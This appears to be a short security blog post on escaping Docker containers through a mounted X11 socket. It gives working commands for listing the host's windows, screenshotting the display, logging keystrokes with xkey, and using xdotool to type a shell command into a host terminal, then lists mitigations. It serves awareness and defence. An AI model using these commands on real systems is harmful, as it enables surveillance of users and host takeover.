Use Docker to run GUI applications they said.
Mount the X11 socket they said.
Allow other users to access your X session they said.
This post covers Docker container breakouts by abusing bad security practices related to the X11 socket.
To display windows spawned through a Docker container, people often launch containers following these steps:
-e DISPLAY=$DISPLAYto share the display variable value
-v /tmp/.X11-unix:/tmp/.X11-unix:roshares the X11 socket - optionally as read only.
- “I can’t see the window, let’s google…”
- “Let’s just execute
xhost +local:rootand it works!”
The X11 socket is mounted as read only - it’s secure right?
These attacks can be performed after gaining access to a Docker container:
Reading Window Information
xwininfo -root -tree it’s possible to check which windows are opened on the host system, including the window titles:
[...] 0xredacted "[i3 con] container around 0xredacted": ("i3-frame" "i3-frame") [...] 1 child: 0xredacted "Write: super secret thing": ("Msgcompose" "Thunderbird") [...] [...]
xwd -root -screen > screenshot.xwd && convert screenshot.xwd screenshot.png can be used to create a screenshot of the hosts display which makes it possible to watch every action a user performs on the system.
By mounting the X11 socket into the container a user doesn’t just mount the display. Additionally they keyboard also gets shared, so to say. With this, it’s possible to log all keystrokes. There may be better tools for this, but during tests xkey seemed to perform very reliable. Using
xkey it’s possible to perform a specific action in case a previously defined key gets hit.
Getting a shell
Although it’s not very stealthy, this method allows getting a shell on the host system. This works by sending keystrokes to the X server in order to open a terminal and execute commands:
xdotool key <Shortcut to open a terminal> xdotool type 'xterm' xdotool key Return xdotool type --delay 50 '<Desired reverse or bind shell command>' xdotool key Return
- Use XAuthority and don’t use the root user to spawn an X application.
- Check x11docker which basically creates a new X server for isolation purposes.